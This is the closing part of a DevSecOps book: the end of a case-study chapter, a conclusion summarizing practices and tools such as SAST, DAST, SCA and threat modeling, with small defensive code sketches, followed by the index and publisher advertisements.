The case studies that were outlined in this chapter demonstrated the practical implementation of DevSecOps across a diverse range of industries and highlighted the significant benefits that can be reaped from this approach. From the FinTech sector (FinServ Corporation) to a large e-commerce platform (Verma Enterprises), a healthcare provider (HealthPlus), a government agency (GovAgency), and an IT company (TechSoft), each organization showcased the transformative power of integrating security into the heart of their development and operations processes.
A common theme throughout these case studies was the shift toward a culture where security is everyone’s responsibility. This cultural shift, underpinned by ongoing training and awareness programs, was a key factor in their successful DevSecOps implementations.
Another crucial takeaway is the early integration of security within the CI/CD pipeline, leading to early detection and mitigation of vulnerabilities. This resulted in improved security postures for these organizations and better compliance with industry regulations.
Lastly, DevSecOps helped these organizations accelerate their software delivery processes. By catching and fixing vulnerabilities earlier in the development life cycle, they reduced the costs and time required for remediation, leading to quicker software releases.


These case studies demonstrated that regardless of an organization’s size or the industry it operates in, a well-executed shift to DevSecOps can result in significant benefits. It enhances security, improves regulatory compliance, speeds up software delivery, and provides a robust foundation for building high-quality software solutions in the modern digital world. In the next chapter, we will summarize the main topics covered in the book.

16
Conclusion

DevSecOps in Action has provided a comprehensive exploration of the principles and practices of DevSecOps, illuminated through a series of real-world case studies across diverse industries. Each case study has highlighted the transformative impact of embedding security within the heart of development and operations, reiterating that a cultural shift toward shared security responsibility is critical for modern software development.

Key insights from this book include the value of early integration of security within the CI/CD pipeline, the importance of ongoing training and awareness programs, and the power of continuous monitoring and automated compliance checks. The case studies underscored these points, demonstrating improved security postures, better regulatory compliance, and accelerated software delivery.

Perhaps most importantly, this book has stressed that a successful DevSecOps transition is not a one-off project or change but a continuous journey of learning and improvement. This journey requires staying updated on the latest security threats and mitigation strategies and continually refining and enhancing DevSecOps practices.

In conclusion, DevSecOps in Action is a valuable guide for organizations seeking to understand and implement DevSecOps. It proves that regardless of size, sector, or complexity of operations, a well-executed shift to DevSecOps can yield significant benefits, leading to safer, higher-quality, and more efficient software delivery. Through its practical approach and real-life examples, this book has equipped you with the knowledge and confidence to undertake a DevSecOps journey.

DevSecOps – what and how?

DevSecOps is a philosophy that integrates security practices within the DevOps process. It is a natural evolution of DevOps, where teams use automation and monitoring at every step of the software construction process. The central idea is “Security as Code,” meaning security controls are managed and automated just like any other software. A funny way to look at it is that it’s like getting someone to brush their teeth daily; it’s a lot easier if you integrate it as a habit rather than a separate task.
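To make the “Security as Code” idea concrete, here is a minimal sketch of a security control written as ordinary, version-controlled, unit-testable code. The configuration shape and rule names are invented for illustration and are not taken from any particular tool.

```python
# Hypothetical "Security as Code" sketch: a security control expressed as a
# plain, testable function. Because it is just code, it lives in version
# control, goes through code review, and runs in CI like any other software.

def check_config(config: dict) -> list[str]:
    """Return a list of policy violations found in a deployment config."""
    violations = []
    # Rule 1 (invented for this example): storage must be encrypted at rest.
    if not config.get("encryption_at_rest", False):
        violations.append("encryption_at_rest must be enabled")
    # Rule 2 (invented): no security group may be open to the whole internet.
    if "0.0.0.0/0" in config.get("allowed_cidrs", []):
        violations.append("security group must not allow 0.0.0.0/0")
    return violations
```

A pipeline step could simply fail the build when `check_config` returns a non-empty list, which is the whole point: the control is enforced automatically, not remembered manually.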


DevSecOps principles and processes

The key principle behind DevSecOps is the integration of security into every part of the development process, rather than treating it as a separate stage. Imagine trying to staple together separate pieces of a project at the end; it’s more prone to fall apart. Embedding security from the start, by contrast, is like weaving a sturdy safety net into the project’s fabric.

The DevSecOps processes involve CI, CD, and IaC, all executed with an eye on security. Automated security checks run at every integration and deployment, and security vulnerabilities are dealt with as they come up, instead of being relegated to the end.

DevSecOps tools

There’s a broad array of tools that support DevSecOps. Here are some of them:
• Static application security testing (SAST) tools, such as Snyk and SonarQube, examine source code for potential security vulnerabilities. It’s like having a grammar checker for your code!
• Dynamic application security testing (DAST) tools, such as OWASP ZAP and Nessus, identify vulnerabilities in a running application. It’s like a secret agent spying on the application, but for good reasons.
• Container security tools, such as Aqua and Twistlock, provide security for your Docker and Kubernetes environments. It’s like a personal bodyguard for your containers!
• Security orchestration, automation, and response (SOAR) tools, such as Splunk Phantom, IBM Security Resilient, and Palo Alto Networks Cortex XSOAR, help automate and manage responses to security events. They are like an automated firefighter, ready to put out security fires.
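To give a rough feel for what a SAST tool does, here is a deliberately tiny static check. Real SAST tools such as those listed above build full syntax trees and data-flow graphs; this regex sketch, with a hand-picked pattern list invented for the example, only conveys the core idea of flagging risky code without ever executing it.

```python
import re

# Toy "SAST" illustration: scan Python source text for a few known-risky
# patterns and report the line number of each finding. This is a sketch of
# the concept, not a substitute for a real scanner.

RISKY_PATTERNS = {
    r"\beval\(": "use of eval()",
    r"\bpickle\.loads\(": "unpickling untrusted data",
    r"shell\s*=\s*True": "subprocess with shell=True",
}

def scan_source(source: str) -> list[tuple[int, str]]:
    """Return (line_number, finding) pairs for risky patterns in the source."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern, message in RISKY_PATTERNS.items():
            if re.search(pattern, line):
                findings.append((lineno, message))
    return findings
```

Run in a CI job, a non-empty findings list would fail the build, which is exactly how SAST gates are typically wired into a pipeline.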

DevSecOps techniques

The techniques for implementing DevSecOps make security an integral part of the software development life cycle. They include threat modeling, secure coding practices, regular code reviews, automated testing, and more. Imagine your code as a house you’re building: these techniques are the equivalent of laying a strong foundation, using quality materials, regularly checking for cracks, and ensuring safety standards are met.
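One of these techniques, threat modeling, can be sketched as data plus a prioritization rule. The following is a hypothetical example loosely following the STRIDE categories; the asset names and the simple likelihood-times-impact scoring are invented for illustration, and real threat modeling (with tools such as OWASP Threat Dragon) is considerably richer.

```python
from dataclasses import dataclass

# STRIDE threat categories, as commonly abbreviated.
STRIDE = {"S": "Spoofing", "T": "Tampering", "R": "Repudiation",
          "I": "Information disclosure", "D": "Denial of service",
          "E": "Elevation of privilege"}

@dataclass
class Threat:
    asset: str
    category: str   # one of the STRIDE keys above
    likelihood: int  # 1 (low) .. 3 (high)
    impact: int      # 1 (low) .. 3 (high)

    @property
    def risk(self) -> int:
        # Simplistic invented scoring: likelihood multiplied by impact.
        return self.likelihood * self.impact

def prioritize(threats: list[Threat]) -> list[Threat]:
    """Highest-risk threats first, so mitigation effort goes where it matters."""
    return sorted(threats, key=lambda t: t.risk, reverse=True)
```

Recording the model as code means it can be reviewed, diffed, and updated alongside the system it describes, in keeping with the DevSecOps theme.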

Governance and an effective Security Champions program

Governance in DevSecOps involves defining roles and responsibilities, policies, and standards related to security in the DevOps process. As with an experienced chef, knowing which ingredients (policies) to use, in what quantities (standards), and when to add them (roles and responsibilities) is crucial to the result.


The Security Champions program, on the other hand, is like a society of security evangelists within your team. Members are trained in security best practices and serve as the go-to people for security-related issues. They help drive the security culture and ensure that DevSecOps practices are implemented effectively.

Let’s delve into some more detailed conclusions from this book:
• Culture shift: A recurrent theme across all the case studies is the importance of a cultural shift toward treating security as everyone’s responsibility. This culture isn’t created overnight; it requires continuous effort, training, and awareness programs to nurture and maintain.
• Security integration: Another critical takeaway is the value of integrating security early into the CI/CD pipeline. When security checks and controls are built into the development process from the beginning, vulnerabilities can be detected and addressed earlier, reducing the cost and complexity of remediation.
• Automated compliance checks: All the case studies in this book highlighted the use of automated compliance checks. These not only save time and reduce human error but also ensure consistent adherence to the necessary regulations.
• Continuous monitoring and improvement: This book stressed the importance of ongoing monitoring and refinement of DevSecOps practices. This includes monitoring security metrics, regularly reviewing security procedures, and continuously learning and improving to keep up with evolving security threats.
• Learning from incidents: Each case study emphasized learning from security incidents. This includes conducting post-incident reviews to understand what went wrong, how it can be prevented in the future, and how the response can be improved. This iterative learning process is crucial for continually improving the organization’s security posture.
• Tailoring practices: The case studies also showed that there’s no one-size-fits-all approach to DevSecOps. Each organization had to tailor its DevSecOps practices and tools to its specific context and needs.
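The automated compliance checks mentioned above can be sketched in a few lines: compare an environment's actual settings against a required baseline and report any drift. The setting names here are hypothetical; real pipelines would pull actual values from infrastructure APIs or use dedicated tools such as Inspec or OpenSCAP.

```python
# Hypothetical compliance baseline; the keys and values are invented for
# this sketch, not drawn from any real standard.
BASELINE = {
    "tls_min_version": "1.2",
    "audit_logging": True,
    "mfa_required": True,
}

def compliance_report(actual: dict) -> dict:
    """Map each baseline setting to its required value, actual value, and status."""
    return {
        key: {"required": required,
              "actual": actual.get(key),
              "compliant": actual.get(key) == required}
        for key, required in BASELINE.items()
    }

def is_compliant(actual: dict) -> bool:
    """True only if every baseline setting matches."""
    return all(item["compliant"] for item in compliance_report(actual).values())
```

Because the check is deterministic and scripted, it can run on every deployment, giving the consistent, low-error enforcement the case studies describe.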

Topics covered in this book

The following topics were covered in detail:
• Threat modeling: Threat modeling is a proactive approach to identifying, understanding, and mitigating potential security threats. In the case of the government agency (GovAgency), threat modeling was used to determine the most likely and most dangerous threats to its infrastructure. This helped it prioritize its security efforts and invest in the most effective countermeasures.
• Software composition analysis (SCA): SCA is used to identify potential vulnerabilities in the open source components of software. The IT company (TechSoft) relied heavily on SCA to ensure that the open source components it used did not compromise its software’s security. SCA helped the company keep track of all third-party components, their associated licenses, and known vulnerabilities.


• SAST and DAST: SAST involves examining the source code for potential vulnerabilities, while DAST involves testing a running application for vulnerabilities. The e-commerce platform (ShopNet) implemented both SAST and DAST in its CI/CD pipeline to catch security issues early and reduce the time and cost of remediation.
• Observability: Observability, which is the ability to infer the internal states of a system from its outputs, is critical to understanding system performance and identifying anomalies. In HealthPlus’ case, enhancing observability was a key part of its DevSecOps strategy. It enabled the provider to spot abnormal system behavior that could signify a security breach and respond rapidly.
• Chaos engineering: Chaos engineering is the practice of deliberately injecting failure into systems to ensure they can withstand unexpected disruptions. For TechSoft, chaos engineering became an essential part of its strategy to ensure its software was resilient against security threats. Regularly “breaking” its systems in controlled ways allowed it to identify weaknesses before they could be exploited by malicious actors.
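The chaos engineering idea above can be illustrated with a toy experiment: deliberately inject failures into a call and verify that the retry logic around it still succeeds. Real chaos tooling targets whole systems rather than single functions; the wrapper and retry helper below are invented purely to show the principle of breaking things on purpose, on your own terms.

```python
import random

def flaky(fn, failure_rate, rng):
    """Wrap fn so it raises RuntimeError with probability failure_rate."""
    def wrapper(*args, **kwargs):
        if rng.random() < failure_rate:
            raise RuntimeError("injected failure")
        return fn(*args, **kwargs)
    return wrapper

def call_with_retries(fn, attempts=5):
    """Retry fn up to `attempts` times; re-raise if every attempt fails."""
    for attempt in range(attempts):
        try:
            return fn()
        except RuntimeError:
            if attempt == attempts - 1:
                raise
```

A seeded random generator makes such experiments reproducible, which matters when you want a failed chaos run to be debuggable rather than a one-off mystery.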

What’s next?

The next book in the DevSecOps series could explore advanced concepts and the deeper intricacies of the practice. It would be a hands-on book containing examples, code, and pipelines that you could test and learn with. Here’s a proposed outline:
1. Advanced DevSecOps strategies: The book could delve deeper into implementing more sophisticated DevSecOps strategies that help organizations achieve greater security resilience. Topics could include multi-layered defense systems, cloud-native security strategies, and how to use artificial intelligence and machine learning to enhance security measures. Just like leveling up in a video game, these advanced strategies are the power-ups your DevSecOps team needs!
2. Dealing with DevSecOps challenges: A significant portion of the book might be dedicated to handling challenges and setbacks in a DevSecOps setup. These could include managing false positives in security checks, dealing with legacy systems, navigating regulatory challenges, and more. Picture these challenges as the “boss fights” in your DevSecOps journey.
3. Enhancing team dynamics in DevSecOps: The book could discuss fostering better communication between the Dev, Sec, and Ops teams, developing a security-first mindset in all team members, and cultivating an environment of continuous learning. It’s like running a successful band; you need harmony between all the members to produce a beautiful symphony.


4. DevSecOps in different industry verticals: The book could also explore how DevSecOps is implemented in various industry verticals, such as finance, healthcare, and retail, and how it needs to be tailored to fit the unique requirements of each. Think of it as cooking a dish for different palates; you need to adjust the ingredients and cooking methods based on what’s preferred.
5. The future of DevSecOps: It’s always crucial to keep an eye on the horizon. The book could discuss emerging trends and technologies in the DevSecOps field, such as quantum computing’s impact on security, the evolving landscape of cyber threats, and the rise of PrivacyOps. It’s like trying to predict the next big fashion trend; you never quite know what’s going to be “in,” but you can look at patterns and make educated guesses.
6. More case studies and real-world examples: No book would be complete without real-world examples. More case studies and interviews with industry experts could give readers valuable insights into how DevSecOps is being used in the trenches. It’s like hearing war stories from seasoned veterans; there’s always something to learn from their experiences.

Case studies and conclusion

Various case studies show how companies have successfully integrated DevSecOps and the benefits they’ve derived from it: speeding up development cycles, identifying vulnerabilities earlier, and reducing costs. In one case, a company ran a weekly “bug bounty” event, turning vulnerability hunting into a fun game and achieving a significant reduction in security issues.

Integrating security into the DevOps process is not only a best practice but an essential strategy for organizations to protect their assets and ensure the delivery of safe, secure products. Imagine running a marathon while juggling; that’s DevSecOps in a nutshell, blending speed (DevOps) with skill (security) to create a secure, agile product development environment.

DevSecOps in Action has shown that a robust DevSecOps strategy involves much more than a cultural shift. It requires the careful application of sophisticated techniques and practices such as threat modeling, SCA, SAST, DAST, enhanced system observability, and chaos engineering. These elements work together to create a system where security is integrated at every step of the development process, and continuous improvement and learning are at the heart of the organization’s approach to security.

This book concluded with practical tips and advice for those looking to build a career in DevSecOps, akin to a guide for “newbie” adventurers starting their quests in a fantasy game. The next book would keep plenty of funny anecdotes and analogies to entertain and engage readers. At the end of the day, learning should be fun!


Index

A advanced DAST techniques API testing 150 authentication testing 150 fuzz testing 150 mobile application testing 151 Affero General Public License (AGPL) 185 Agile methodology 6 scrum 6 sprints 7 teams working together 7, 9 Alertmanager 79, 168 Ansible 75, 77, 139 API testing 150 Appium 72 Aqua 216 artifactory 34 artifact storing 72 considerations 74 key components and terminologies 73 popular tools 73 significance 72, 73 tools, key features 73, 74 Artificial intelligence for IT operations (AIOps) 79

authentication testing 150 automated builds 68 challenges and solutions 70 key components and terminologies 69 popular tools 70 significance 69 AWS CodeDeploy 75 AWS Simple Storage Service (S3) 73 Azure Artifacts 73

B Bamboo 75 Bandit 122 behavior-driven development (BDD) 72 Brakeman 123

C Capital One data breach case study 140 CD 63-65 scrapbook example 64, 65 chaos engineering 51-53, 218 basic principles 57 best practices 54 challenges 59 need for 53


performance effectiveness, measuring 55, 56 specific systems and services organizations use 55 techniques 54 tools 56 versus, other testing measures 59, 60 chaos engineering principles 57 robust, developing from failures 58 team communication strategies 57, 58 ChatOps 79 Chef 76, 77, 139 CI 63, 64 CI/CD 63 CI/CD pipeline 64 benefits 65, 66 setting up, for DevSecOps program 164 significance 82-84 steps 65 technicalities, of setting up 165 CI/CD pipeline automation artifact storing 72 automated builds 68 continuous testing 70 deployment automation 74 environment consistency 76 monitoring and feedback 78 performing 66 rollbacks 79 source control 67 CI/CD pipeline set up GitLab CI/CD 165 Jenkins 165 pre-setup 165 Travis CI 166 CircleCI 70, 72 CloudFormation 139 Codecov security incident case study 139, 140

command-line interface (CLI) 130 container security tools 216 continuous testing 70 challenges and solutions 71 key components and terminologies 71 popular tools 71 significance 70 copyleft licenses 180 impact of software redistribution, and modifications 180 cross-site request forgery (CSRF) 145 cross-site scripting (XSS) 92, 116 Cucumber 72

D DAST environment setting up 152 suitable environment, selecting 152 test data, preparing 153 testing environment, isolating 153 DAST integration, into SDLC continuous deployment (CD) 146 continuous integration (CI) 146 DAST tool selecting 151 Dependency-Check 110 deployment automation 74 advanced tools and technologies 76 challenges 75 key components and terminologies 75 popular tools 75 real-world scenarios 76 significance 74 deployment phase, threat modeling threat modeling updates 92 design phase, threat modeling attack surface analysis 92 threat model creation 91


development phase, threat modeling code reviews and static analysis 92 coding guidelines, securing 92 development process audit 37 compliance 37 developer tools 38 incident response 38 monitoring 38 multi-cloud security 37 security 37 vulnerability management 38, 39 DevOps 9, 10 DevSecOps 10, 17, 136, 162, 176, 181, 215 cultural shift 163 elements 17 governance 216 maturity levels 12-16 practical implementation 163 practices 217 principles 216 processes 10, 11, 216 relevance, to license compliance 176, 177 Security Champions program 217 techniques 216 tools 216 DevSecOps case studies best practices 212 FinServ Corporation 205, 206 GovAgency 205, 210 HealthPlus 205, 208 TechSoft 205, 211 Verma Enterprises 205, 207 DevSecOps challenges 27 continuous application changes 28 developer knowledge gap 28 lack of AppSec tool integration 29

DevSecOps environment cloud-native architectures 35, 36 cloud-native environment 35 controls, automating 36 infrastructure, provisioning 36 monitoring 35 toolchains, securing 36 DevSecOps environment security 33 parameters, for defining security posture 34 technology effectiveness, measuring 34 third-party component, discovering 34 vulnerabilities, addressing 34 vulnerabilities inventory, building 34 workflows, managing 34 DevSecOps, in production CI/CD pipeline, managing 168 CI/CD pipeline, monitoring 168 continuous compliance and auditing, incorporating into pipeline 169 incidents, managing 169 managing 168 open source tools, for alerting 168 open source tools, for logging 168 open source tools, for monitoring 168 security breaches, responding to 169 DevSecOps, in software development best practices 213 DevSecOps pipeline impact of software licenses 181, 182 DevSecOps principles 22 automation 23 checkpoints 27 CI/CD pipeline, unifying 22 compliance checks 24 cross-skilling 25 cultural aspect approach 25 development environments 27 documentation 26


failing fast 23 innovation 23 teams, educating 25 teams, empowering 25 third-party component dependencies, analyzing 22 third-party component dependencies, identifying 22, 23 toolchains 27 DevSecOps program benefits 163, 169-171 challenges 164 CI/CD pipeline, setting up 164 continuous improvement 164 security controls, implementing 166 techniques, for setting up 162 Dev teams 197 Docker 75, 77 Docker Hub 73 documentation, DevSecOps audit trails 26 change management 26 code documentation 26 design documentation 26 incident reports 26 security policies and procedures 26 testing 26 validation 26 dynamic application security testing (DAST) 36, 92, 116, 143, 216, 218 advanced techniques 150, 151 advantages 144 DAST tool, selecting 151, 152 future 157 importance, in secure development environments 148 incorporating, into application development life cycle 149, 150

incorporating, into DevOps processes 154 integrating, with IAST 154 integrating, with other security tools 153 integrating, with RASP 154 integrating, with SAST 153 limitations 145 performing, in organization 152, 153 process 145 remediation, verifying 155 reporting and remediation 154 reports, generating 155, 156 results, analyzing 154 results, correlating with other security data sources 154 retesting 156 usage, for developers 146, 147 usage, for security testers 147, 148 versus IAST 156 versus RASP 157 versus SAST 156 vulnerabilities, identifying in development process 155 vulnerabilities, prioritizing 155 vulnerabilities, remediating 155 dynamic testing 33

E ElastAlert 168 Elastic versus AWS licensing drama case study 185 elements, DevSecOps collaboration 17 culture shift 17 education and training 17 empowerment 17 shared responsibility 17 skills and expertise 17


ELK Stack 79, 162, 168 environment consistency 76 challenges 77 significance 76 tools 77 ESLint 123 executive buy-in 198 importance 198 securing 198

F Federal Information Security Management Act (FISMA) 210 FeedbackHub 79 FindSecBugs 123 FinServ Corporation case study 206 challenges, faced before implementing DevSecOps 206 results and impact on software development 206, 207 steps, for DevSecOps transition 206 Flyway 80 FOSSA 110 fuzz testing 150

G General Data Protection Regulation (GDPR) 209 Git 80 GitHub Packages 73 GitLab CI/CD 72, 75 GNU General Public License (GPL) 175 Google Cloud Storage 73 Gosec 124 GovAgency case study 210 DevSecOps practices and tools 210 results and benefits 210 security requirements 210 Gradle 70 Grafana 79, 168 graphical user interface (GUI) 130 Graylog 168

H health check 25 Health Insurance Portability and Accountability Act (HIPAA) 209 HealthPlus case study 208 DevSecOps practices and tools 209 results and benefits 209 security, in healthcare data and systems 209 HR and learning and Dev teams 198

I IaC, in DevSecOps 136 challenges and mitigation 138 key benefits 138 process 137, 138 role 137 Infer 124 Infrastructure as Code (IaC) 129, 130 advantages 131, 132 disadvantages 132 metrics 133, 134 principles 36 process 133 scanning 129, 130 security best practices 135, 136 toolset functionalities 130, 131


versus Static Application Security Testing 134, 135 vulnerabilities, identifying with 132 Inspec 169 integration tests 71 Interactive Application Security Testing (IAST) 116

J Jenkins 70, 71, 75 JFrog Artifactory 73 JUnit 71

K key performance indicators (KPIs) 16, 17 Kubernetes 76, 77, 80

L LaunchDarkly 80 license compliance significance 175, 176 license policies, fine-tuning 183 continuous review and improvement 184, 185 exception handling 184 organizational standard, establishing 184 license reviews 182 documentation and continuous improvement 183 legal and security teams, engaging 183 tools and techniques 182 Liquibase 80 LoadRunner 72

M management/leadership team 198 Maven 70 Mend.io 111 metrics, Infrastructure as Code (IaC) code coverage 133 compliance 134 deployment frequency 134 mean time to recovery (MTTR) 134 security vulnerabilities 134 Microsoft Threat Modeling Tool 93 mobile application testing 151 Mobile Security Framework (MobSF) 151 monitoring 44 monitoring and feedback 78 best practices 79 challenges 78 feedback, from multiple fronts 79 significance 78 tools 78, 79 MSBuild 70

N National Vulnerability Database (NVD) 98 Netflix environment improvement case study 140 New Relic 78 Nexus Lifecycle by Sonatype 110 Nexus Repository 73

O observability 41, 218 benefits 48 challenges 46, 47 implementing, with monitoring 45, 46

Index

key functions 42, 43 linking, with monitoring 44 logs 42 metrics 42 need for 41 setting up 47 tracing 42 Octopus Deploy 75 OpenSCAP 169 open source IaC tools 138 Ansible 139 Chef 139 CloudFormation 139 Pulumi 139 Puppet 139 SaltStack 139 Terraform 138 open source SAST tools Bandit 122 Brakeman 123 ESLint 123 FindSecBugs 123 Gosec 124 Infer 124 PMD 123 RIPS 123 Snyk 123 open source security tools configuration management 167 vulnerability scanning 167 open source software (OSS) 39 open source threat modeling tools 93 Microsoft Threat Modeling Tool 93 OWASP Threat Dragon 93 PyTM 93 SeaSponge 94 Open Web Application Security Project (OWASP) 12

Ops team 198 OWASP Threat Dragon 93

P penetration testing 36, 116 permissive licenses 179 security implications 180 personally identifiable information (PII) 209 PMD 123 Postman 72 pre-development phase, threat modeling 91 asset identification 91 process framework 6 product development processes 4 Agile methodology 6 Waterfall model 4 Prometheus 78, 168 proprietary licenses 181 security constraints and obligations 181 Pulumi 139 Puppet 76, 77, 139 PyTM 93

Q QUnit 72

R Redis licensing change case study 185 regression tests 71 Repository (Repo) 67 RIPS 123 rollbacks 79, 80 best practices 81 challenges 81


considerations 81 potential pitfalls 82 significance 80 tools 80, 81 Rollbar 76

S SaltStack 139 SAST metrics code coverage 118 false positive rate 118 remediation time 119 risk ranking 119 vulnerability density 118 SAST tools 116 functionalities 116, 117 SCA metrics license compliance violations 105 mean time to remediation (MTTR) 106 outdated dependencies 105 policy violations 106 repeated vulnerabilities 106 severity breakdown of vulnerabilities 105 total dependencies 105 vulnerable dependencies 105 SCA tools 99 Dependency-Check 110 FOSSA 110 functionalities 99 Mend.io 111 Nexus Lifecycle by Sonatype 110 Snyk 110 Veracode Software Composition Analysis 111 WhiteSource 110 scrum 6

scrum meetings checking backlog meetings 7 daily standup meetings 7 retrospective meetings 7 sprint planning meetings 7 sprint review meetings 7 SeaSponge 94 Sec team 197 security breaches, SCA Capital One (2019) 112 Equifax (2017) 111 Marriott (2018) 113 Sony Pictures (2014) 112 Target (2013) 112 Yahoo! (2013-2014) 111, 112 Security Champions 198 Security Champions program 188, 217 as organizing, football team 191 aspects 193, 194 benefits 194-197 communication 192 considerations, for shaping organization's DevSecOps program 189 considerations, from people perspective 189, 190 delegation 192 effectiveness, evaluating with strategic aspects 200 effectiveness, evaluating with technical aspects 199, 200 effect, measuring 199 engaging 192 executive buy-in, importance 198 executive buy-in, securing 198 individuals, attracting to program 191 motivation 192 motivation to participate 193 motivation to support 193

Index

roles, of different teams 197, 198 roles within organization 195, 196 shared responsibility model 197 structuring 190 training 192 security controls, DevSecOps program implementing 166 open source security tools, identifying 167 security policies and procedures, implementing 167 Security Information and Event Management (SIEM) 149 security orchestration and automated response (SOAR) 216 security posture management 32 pipelines, managing 33 pipelines, testing 33 regular meetings 32 tools 33 Selenium 71 Sentry 76, 79 Server Side Public License (SSPL) 185 service-level agreements (SLAs) 10 shared responsibility model 197 site reliability engineering (SRE) team 41 Snyk 110, 123 software bill of materials (SBOM) 23 software composition analysis (SCA) 22, 36, 97, 98, 211, 217 advantages 101, 102 benefits 101 disadvantages 102 integrating, with CI/CD tools 107 integrating, with container security 107 integrating, with DAST 107 integrating, with IAST 107 integrating, with other security tools 106

integrating, with SAST 106 integrating, with threat intelligence platforms 107 issues, resolving without breaking build 108 metrics 105, 106 open source SCA tools 110 process 103, 104 security breaches, from past 111, 112 security flaws detection 109 significance 100, 101 versus SAST 102, 103 working 98 software delivery life cycle 181 software development life cycle (SDLC) 3, 46, 91, 115, 188 software licenses copyleft licenses 180 impact, on DevSecOps pipeline 181, 182 permissive licenses 179 proprietary licenses 181 types 179 source control 67 best practices 67, 68 common terminologies 67 significance 67 Spinnaker 75 Split.io 80 Splunk 79 sprints 7 Static Application Security Testing versus Infrastructure as Code (IaC) 134, 135 static application security testing (SAST) 36, 101, 115, 116, 216, 218 benefits 121 case study 124, 125 CI/CD integration 119 DAST integration 119 IDE integration 119


integrating, with other security tools 119 issues, resolving without breaking build 120 limitations 121, 122 metrics 118 open source SAST tools 122-124 process and workflow 117, 118 threat intelligence integration 119 versus SCA 102, 103 vulnerabilities, identifying 117 WAF integration 119

T TechSoft case study 211 DevSecOps practices and tools 211 results and benefits 212 security requirements 211 Terraform 76, 77, 138 test automation tools 71 test environment 71 testing phase, threat modeling 92 penetration testing 92 TestNG 72 TheHive 169 threat modeling 85, 86, 217 importance, in SDLC 87, 88 limitations 94, 95 performing 88, 89 process 86, 87 techniques 91 threat modeling integration, into DevSecOps 91 deployment phase 92 design phase 91 development phase 92 pre-development phase 91 testing phase 92

threat modeling techniques 89 attack trees 89 brainstorming 89 Data Flow Diagrams (DFDs) 90 Denial of Service (DoS) 90 elevation of privilege 91 information disclosure 90 repudiation 90 STRIDE model 90 tampering 90 threat modeling tools for organizations 94 time-to-restore (TTR) 46 traditional licenses, versus open source licenses 177 community oversight 178 cost and resource allocation 179 modification and redistribution 178 source code access 178 vendor dependency 178 Travis CI 70, 72 Trello boards 8, 9 Twistlock 216

U unit tests 71 UserVoice 79

V Veracode Software Composition Analysis 111 Verma Enterprises case study 207 DevSecOps practices and tools 208 results and benefits 208 security challenges 207

Index

W Waterfall model 4, 6 design 5 development 5 implementation and integration 5 planning 5 production and maintenance 6 requirement gathering and analysis 5 testing 5 Wazuh 169 WhiteSource 110


www.packtpub.com

Subscribe to our online digital library for full access to over 7,000 books and videos, as well as industry-leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe?
• Spend less time learning and more time coding with practical eBooks and videos from over 4,000 industry professionals
• Improve your learning with Skill Plans built especially for you
• Get a free eBook or video every month
• Fully searchable for easy access to vital information
• Copy and paste, print, and bookmark content

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at packtpub.com and, as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at customercare@packtpub.com for more details.

At www.packtpub.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks.

Other Books You May Enjoy If you enjoyed this book, you may be interested in these other books by Packt:

Oracle Linux Cookbook
Erik Benner | Erik Thomsen
ISBN: 978-1-80324-928-5
• Master the use of DNF for package management and stream-specific installations
• Implement high availability services through Podman and Oracle Linux Automation Manager
• Secure your system with Secure Boot and at-rest disk encryption techniques
• Achieve rebootless system updates using the Ksplice technology
• Optimize large-scale deployments with Oracle Linux Automation Manager and Ansible
• Gain practical insights into storage management using Btrfs and LVM


Essential Linux Commands
Paul Olushile
ISBN: 978-1-80323-903-3
• Execute commands to launch applications, control services, and change network settings
• Develop your skills to use commands for package management, file manipulation, and networking
• Get clear explanations and practical examples for each command
• Discover tips and techniques to use the Linux command line effectively
• Get to grips with troubleshooting common problems and fixing errors
• Master best practices to manage and maintain Linux systems
• Develop expertise in system performance, security, and Linux in the cloud


Packt is searching for authors like you

If you’re interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.


